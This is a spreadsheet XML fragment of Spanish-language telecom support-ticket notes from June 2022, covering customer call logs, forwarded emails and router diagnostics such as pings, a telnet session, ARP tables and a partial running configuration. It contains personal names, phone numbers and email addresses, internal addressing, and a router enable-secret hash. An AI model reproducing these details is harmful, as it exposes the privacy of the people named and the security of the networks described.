!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (3000/3000), ROUND-TRIP MIN/AVG/MAX = 36/39/60 MS</t>
  </si>
  <si>
    <t>F4596860</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA LUCÍA DE LA CRUZ-56327189 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001399962
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ERICKA--- 42100465  ##2 VECES- ENVIA NUEVAMENTE A BUZON ### SE INTENTARA LUEGO##
2001380389
COLA:
NOMBRE: A: 42100465
NÚMERO: 42100465
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42100465
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 10/06/2022 09:24:46
2001380595
COLA:
NOMBRE: A: 42100465
NÚMERO: 42100465
DURACIÓN: 0:00:07
ESTADO: MARCANDO
DETALLES: 42100465
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 10/06/2022 09:24:52</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EN PR   ERICKA--- 42100465 -  ##CLIENTE NO CONTESTA##ENVIA DIRECTO A BUZON ##SE LLAMARON 4 VECES##SE INTENTARA LUEGO
2001370234
COLA:
NOMBRE: A: 42100465
NÚMERO: 42100465
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42100465
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 10/06/2022 09:00:49
2001370641
COLA:
NOMBRE: A: 42100465
NÚMERO: 42100465
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42100465
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 10/06/2022 09:01:46
2001370842
COLA:
NOMBRE: A: 42100465
NÚMERO: 42100465
DURACIÓN: 0:00:11
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42100465
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 10/06/2022 09:01:52
2001370843
COLA:
NOMBRE: A: 42100465
NÚMERO: 42100465
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42100465
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 10/06/2022 09:01:56</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLINETE- ANA LUCÍA DE LA CRUZ-56327189 COEMNTA QUE SE LLAME A CLIENTE EERICKA--- 42100465 --
2001369442
COLA:
NOMBRE: A: 56327189
NÚMERO: 56327189
DURACIÓN: 0:01:56
ESTADO: CONECTADA
DETALLES: 56327189
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 10/06/2022 08:59:30</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE ANA LUCÍA DE LA CRUZ-56327189  ## CLIENTE CONTESTA Y LUEGO CORTA LLAMADA## SE PROCEDE A LLAMARLE NUEVAMENTE
2001368819
COLA:
NOMBRE: A: 56327189
NÚMERO: 56327189
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: 56327189
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 10/06/2022 08:57:32</t>
  </si>
  <si>
    <t>F4596872</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 12:40
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; ARNOLD JOSUE CABALLERO SARMIENTO &lt;ARNOLD.CABALLERO@FARSIMAN.COM&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.HN&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
CC: JAVIER.BONILLA@FARSIMAN.COM &lt;JAVIER.BONILLA@FARSIMAN.COM&gt;; REDES@FARSIMAN.COM &lt;REDES@FARSIMAN.COM&gt;; CALLCENTERTI@FARSIMAN.COM &lt;CALLCENTERTI@FARSIMAN.COM&gt;; SOPORTETECNICOFS@FARSIMAN.COM &lt;SOPORTETECNICOFS@FARSIMAN.COM&gt;
ASUNTO: RE: REVISIÓN DE ANCHO DE BANDA SIMAN CHOLOMA 2 192.168.50.0/24
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4596875</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 11:12
PARA: ACOGUADALUPANA@GMAIL.COM &lt;ACOGUADALUPANA@GMAIL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | ID1395004SV | | COOPERATIVA ACOGUADALUPANA DE R.L
BUEN DÍA ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONADO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO .
DIRECCIÓN:  CHIRILAGUA /SAN MIGUELBO. EL CALVARIO2A. CALLE PTES/N
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
04339969-2	10701	HECTOR IVAN URQUILLA VASQUEZ
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES
ATT</t>
  </si>
  <si>
    <t>SE APERTURA FALLA, CLIENTE YA AUTORIZO LOS PERMISOS DE INGRESO
DE: ACOGUADALUPANA DE R.L. CHIRILAGUA &lt;ACOGUADALUPANA@GMAIL.COM&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 11:38
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | ID1395004SV | | COOPERATIVA ACOGUADALUPANA DE R.L
BUENOS DIAS.
CONFIRMO DE QUE SI PUEDE PRESENTARSE EL TÉCNICO A NUESTRAS INSTALACIONES.</t>
  </si>
  <si>
    <t>F4596889</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FATMA BARAHONA 57181877 PERO NO CONTESTA Y ENVIA A BUZON, SE INTENTARA EN UNOS INSTANTES
2001371941
COLA:
NOMBRE: A: 57181877
NÚMERO: 57181877
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:09
DETALLES: 57181877
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 10/06/2022 09:04:16
2001372018
COLA:
NOMBRE: A: 57181877
NÚMERO: 57181877
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:10
DETALLES: 57181877
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 10/06/2022 09:04:23</t>
  </si>
  <si>
    <t>SE LLAMA AL CL FATMA BARAHONA  AL 57181877 ID 2001377482 PARA EL SEGUIMIENTO DE LAS PRUEBAS DE PRIMER NIVEL Y VALIDAR COMO ESTA EL SERVICIO Y COMENTA QUE YA ESTA OPERATIVO NO ES NECESARIO ALGUNA INTERVENCIÓN, SE  PROCEDE A SOLICITAR EL CIERRE DE LA FALLA AUTORIZA EL CIERRE DEL TICKET SE NOTIFICA AL GESTOR JANGEL.GODINEZ VIA SKYPE</t>
  </si>
  <si>
    <t>F4596893</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  KATERIN VENTURA AL 35462049 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001363416
**</t>
  </si>
  <si>
    <t>F4596919</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE LUIS AL 30247837   CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001390396
**</t>
  </si>
  <si>
    <t>F4596923</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE DONDE INDICA QUE PERSISTE LO REPORTADO. SE PIDE APOYO A CNOC CLARO VÍA SKYPE:
DE: ANA PINEDA [MAILTO:ANA.PINEDA@WALMART.COM]
ASUNTO: RE: ENLACE INESTABLE DE DA-CR- PLANTA GAR (GRANJA AVICOLA RICURA) ID: CONTR0001675129OC
BUENOS DÍAS,
COMPARTO PRUEBAS:
R-CORE-A.S08001.CR#PING 10.76.0.70 REP 1000 SIZE 1500 DF
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1000, 1500-BYTE ICMP ECHOS TO 10.76.0.70, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH THE DF BIT SET
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 98 PERCENT (987/1000), ROUND-TRIP MIN/AVG/MAX = 1/3/12 MS
R-CORE-A.S08001.CR#
R-CORE-A.S08001.CR#
R-CORE-A.S08001.CR#PING 10.78.0.70 REP 1000 SIZE 1500 DF
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1000, 1500-BYTE ICMP ECHOS TO 10.78.0.70, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH THE DF BIT SET</t>
  </si>
  <si>
    <t>--- SE HABLA CON GERALD TORRES 22437253 (CLIENTE), AUTORIZA EL CIERRE.---
RESULTADO: LLAMADA HECHA
NOMBRE: 22437253
NÚMERO: 22437253
INICIO: HOY, 11:05
FIN: HOY, 11:06
DURACIÓN: 0:54
ID DE LLAMADA: 2001603959
...</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO TIENE SEGUIMIENTO POR PARTE DEL GESTOR A CARGO JHONNSER.ESCOBAR DESDE EL HORARIO  10/06/2022 11:08:52 SE NOTIFICA AL GESTOR EL APOYO EN BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR STEVEN MARQUEZ INDICA QUE AUN ESTA INESTABLE INDICA QUE ESTAN REALIZANDO PRUEBAS Y LES MUESTRA PERDIDAS || SE NOTIFICA A GESTOR **
-ID 2001391826
**</t>
  </si>
  <si>
    <t>F4596927</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDDY SUN 42127043 INDICA QUE SE LE VOLVIO A IR EL SERVICIO DESPUES DEL REINICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001397829
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDDY SUN 42127043 MENCIONA QUE EL SERVICIO ES INTERMITENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001373344</t>
  </si>
  <si>
    <t>F4596930</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE STEVE MARQUEZ 2243-7253 COMENTA QUE AUN PERSISTE LA INESTABILIDAD || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001406397
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON LOS DATOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 11:53
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE DA-NI-PLANTA-HORTIFRUTI-MANAGUA ID: 4584285
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
FERNANDO JOSUE OVIEDO GONZALEZ  001-020993-0000A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96932</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CAIDO, SE VALIDA CON PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGE
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.72.215.20
  PING 10.72.215.20: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.215.20 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.53
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.72.215.20
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.215.20/32  DIRECT  0    0                 0.0.0.0         VLANIF339			</t>
  </si>
  <si>
    <t>F4596965</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 12:44
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
CC: SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: IP2050025 / BANCO AGRICOLA, S.A / CAIDA TOTAL / AR
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4596968</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WAGNER BENITO AL 47938702   CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001387229
**</t>
  </si>
  <si>
    <t>F4596971</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL
RE: SOLICITUD DE SOPORTE :::CARGILL - CARGILL TIPITAPA MASAYA - 5508928 - LINK DOWN "FUERA DE SERVICIO " || IMCRL004791</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO, NOS DEBE BRINDAR TELS DE PR; ME DEJAN DEMASIADO TIEMPO EN ESPERA, SE DEBE INTENTAR MÁS TARDE.
ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE :::CARGILL - CARGILL TIPITAPA MASAYA - 5508928 - LINK DOWN "FUERA DE SERVICIO " || IMCRL004791</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 CARLOS MENCIONA QUE YA CUENTAN CON EL TICKET INERNO CERRADO POR PROBLEMAS EN EL UPS DEL CLIENTE
-ID 2001455340</t>
  </si>
  <si>
    <t>F4596979</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ELISEO RAMIREZ  58466198 MENCIONA QUE AUN NO HA RECIBIDO EL CORREO POR LO QUE SOLICITA SE REENVIE EL CORREO
 -----    GERENTE.QUICHE@GENESISEMPRESARIAL.COM -----
-ID 2001969199</t>
  </si>
  <si>
    <t>SE PROCEDE A LLAMAR A CONTACTO NARCISO RAMIREZ, GERENTE DE LA AGENCIA PERO NO RESPONDE, SE INTENTARÁ CONTACTAR NUEVAMENTE EN 30 MINUTOS.
2001567352
COLA:
NOMBRE: A: 48998256
NÚMERO: 55280199
DURACIÓN: 0:00:49
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 11/06/2022 08:25:00
2001568017
COLA:
NOMBRE: A: 48998256
NÚMERO: 55280199
DURACIÓN: 0:00:38
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 11/06/2022 08:29:16</t>
  </si>
  <si>
    <t>EN GESTION CON TECNICOS EN NODO VALIDANDO EQUIPOS UM</t>
  </si>
  <si>
    <t>EN LLAMADA CON PERSONAL TECNICO VALIDANDO ENLACE DE DATOS, SE REALIZA CAMBIO DE EQUIPO ETX</t>
  </si>
  <si>
    <t>GENESIS_CLIE# SHOW CONFIGURE PORT SUMMARY
PORT           NUMBER         NAME            ADMIN    OPER      SPEED
-----------------------------------------------------------------------------
ETHERNET       1              ETH-1           UP       UP        100000000
ETHERNET       2              ETH-2           UP       DOWN      100000000
ETHERNET       3              ETH-3           UP       DOWN      100000000
ETHERNET       4              ETH-4           UP       UP        100000000
ETHERNET       5              ETH-5           UP       DOWN      100000000
ETHERNET       6              ETH-6           UP       DOWN      100000000
ETHERNET       101            MNG-ETH         UP       DOWN      100000000
GENESIS_CLIE#
GENESIS_CLIE# LOGOUT
GENESIS_CLIE#
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;KSCQGTSCN1C1B05B22EIM1&gt;PING -VPN-INSTANCE FUND_GENESIS 10.105.35.35
  PING 10.105.35.35: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.105.35.35: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.105.35.35: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.105.35.35: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.105.35.35: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.105.35.35: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.105.35.35 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;KSCQGTSCN1C1B05B22EIM1&gt;TELNET VPN-INSTANCE FUND_GENESIS 10.105.35.35
TRYING 10.105.35.35 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.105.35.35 ...
USER ACCESS VERIFICATION
USERNAME: GESTIONIP
PASSWORD:
% PASSWORD:  TIMEOUT EXPIRED!
USERNAME:
% USERNAME:  TIMEOUT EXPIRED!
USERNAME:
% USERNAME:  TIMEOUT EXPIRED!
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;KSCQGTSCN1C1B05B22EIM1&gt;TELNET VPN-INSTANCE FUND_GENESIS 10.105.35.35
TRYING 10.105.35.35 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.105.35.35 ...
USER ACCESS VERIFICATION
USERNAME: GESTIONIP
PASSWORD:
CC_FUNDGENESIS_GT_QUICHE_045#SHO IP INT BRIE
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.105.35.35    YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   10.87.163.85    YES NVRAM  UP                    UP
GIGABITETHERNET0/1/0   UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/1/1   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/2   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/3   UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5              10.212.100.87   YES NVRAM  UP                    UP
VLAN1                  192.168.35.1    YES NVRAM  UP                    UP
CC_FUNDGENESIS_GT_QUICHE_045#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.87.163.81           11   DC99.147A.9E71  ARPA   GIGABITETHERNET0/0/1
INTERNET  10.87.163.85            -   2CF8.9BB7.6801  ARPA   GIGABITETHERNET0/0/1
INTERNET  10.105.35.33            3   F41D.6B07.ACDD  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.105.35.35            -   2CF8.9BB7.6800  ARPA   GIGABITETHERNET0/0/0
INTERNET  170.15.35.1             -   2CF8.9BB7.6874  ARPA   VLAN1
INTERNET  170.15.35.80            0   INCOMPLETE      ARPA
INTERNET  192.168.35.1            -   2CF8.9BB7.6874  ARPA   VLAN1
INTERNET  192.168.35.3            6   3473.5ADC.802C  ARPA   VLAN1
INTERNET  192.168.35.4            0   F04D.A22F.F8F5  ARPA   VLAN1
INTERNET  192.168.35.6           44   3473.5ADC.807C  ARPA   VLAN1
INTERNET  192.168.35.15          27   3473.5ADC.80A8  ARPA   VLAN1
INTERNET  192.168.35.30          53   B445.0661.40CE  ARPA   VLAN1
INTERNET  192.168.35.98           0   906C.AC00.D7E6  ARPA   VLAN1
INTERNET  192.168.35.99           0   906C.AC00.DFB6  ARPA   VLAN1
INTERNET  192.168.35.110         26   686D.BCFE.E64B  ARPA   VLAN1
INTERNET  192.168.35.115          0   C465.1645.DE93  ARPA   VLAN1
INTERNET  192.168.35.116          0   C465.1645.DE1C  ARPA   VLAN1
INTERNET  192.168.35.246          8   001A.E86A.7A28  ARPA   VLAN1
INTERNET  192.168.35.247          0   001A.E835.2F76  ARPA   VLAN1
INTERNET  192.168.35.248          0   001A.E838.7322  ARPA   VLAN1
INTERNET  192.168.35.250          1   E81C.BA87.4C26  ARPA   VLAN1
CC_FUNDGENESIS_GT_QUICHE_045#SAHO RUN
                              ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_FUNDGENESIS_GT_QUICHE_045#   SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 8118 BYTES
!
! LAST CONFIGURATION CHANGE AT 14:36:21 UTC SAT JUN 11 2022 BY GESTIONIP
!
VERSION 16.10
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
SERVICE CALL-HOME
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_FUNDGENESIS_GT_QUICHE_045
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 9 $9$AK0SEB6IEDUMAE$HVK2JFK9.FR81DOJ39.Q5JPL9U6LYBBVQMQ7RUFDWPO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527480295
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-527480295
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-527480295
!
CRYPTO PKI TRUSTPOINT SLA-TRUSTPOINT
 ENROLLMENT PKCS12
 REVOCATION-CHECK CRL
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-527480295
 CERTIFICATE SELF-SIGNED 01
  3082032E 30820216 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  30312E30 2C060355 04031325 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 35323734 38303239 35301E17 0D323030 35303431 37353930
  395A170D 33303031 30313030 30303030 5A303031 2E302C06 03550403 1325494F
  532D5365 6C662D53 69676E65 642D4365 72746966 69636174 652D3532 37343830
  32393530 82012230 0D06092A 864886F7 0D010101 05000382 010F0030 82010A02
  82010100 E11EA3A1 26B6D626 1BC4C2B2 22EE65E6 B6932A03 F2A4325C 88B44D83
  7745F6D0 8C3E96D1 32E9EF39 2DD3AFEB D4016C0C 3F553448 0E8A4825 10177107
  0F079A94 FF63FF92 BECD82B6 65C250CC 5CCC4AC2 2C132D99 B222588A 3DF3A506
  839A4BD1 088A15FD 835BCE22 8124EE38 DB83F709 50EF9DDF A699E72D ABCB99A5
  7C169561 ED459F0C 35B245E1 6A5C16C2 4EF0052A E496698F 0B4DA6EF A813AB16
  B8211377 40FA236A 298F5B2C 12E4751A 6B0669E5 6A66819A 99198C6B C0F9B13D
  BC8947B5 70A290B7 605F8D01 9B656137 C7710466 3AE26694 2AB05984 67377566
  657EF6F0 5167B1FB 574EDA4C 21FF5F5B A7E19B93 779728F8 009010D3 8325C9DA
  F0EB0593 02030100 01A35330 51300F06 03551D13 0101FF04 05300301 01FF301F
  0603551D 23041830 168014CB F43F6EA0 78319B93 138D8CEC E5166C5C 704CC930
  1D060355 1D0E0416 0414CBF4 3F6EA078 319B9313 8D8CECE5 166C5C70 4CC9300D
  06092A86 4886F70D 01010505 00038201 010099AB 805412B2 E58D17C4 09F6C0AB
  82996FA0 D70CC492 C2287946 20E0D362 ABF5CABC 52C8F0D2 1BD101E0 DCD71463
  2FC8D52B 250F45F7 F81390FE 9BC6AC00 6F6F36C7 F85C5541 96FC8625 9DA8C347
  AB496113 563D449D 02DAD82C 4C2A8F4B 5A8F4FDA 968C79F5 CD21B04C B7D68905
  24A235D3 E7BF29D7 C1816B7C 36C4E6C7 4976BCFE C096B568 F46C2A3D A4D64134
  194D41D0 65680A16 79216FEE D5059C48 814251E7 019216FF 4280E935 A8635033
  9EDC9C6D F72123BA 6C17D3DC 1FC0822E 4D14B8B8 65CD5139 451CB1B6 CC8B5987
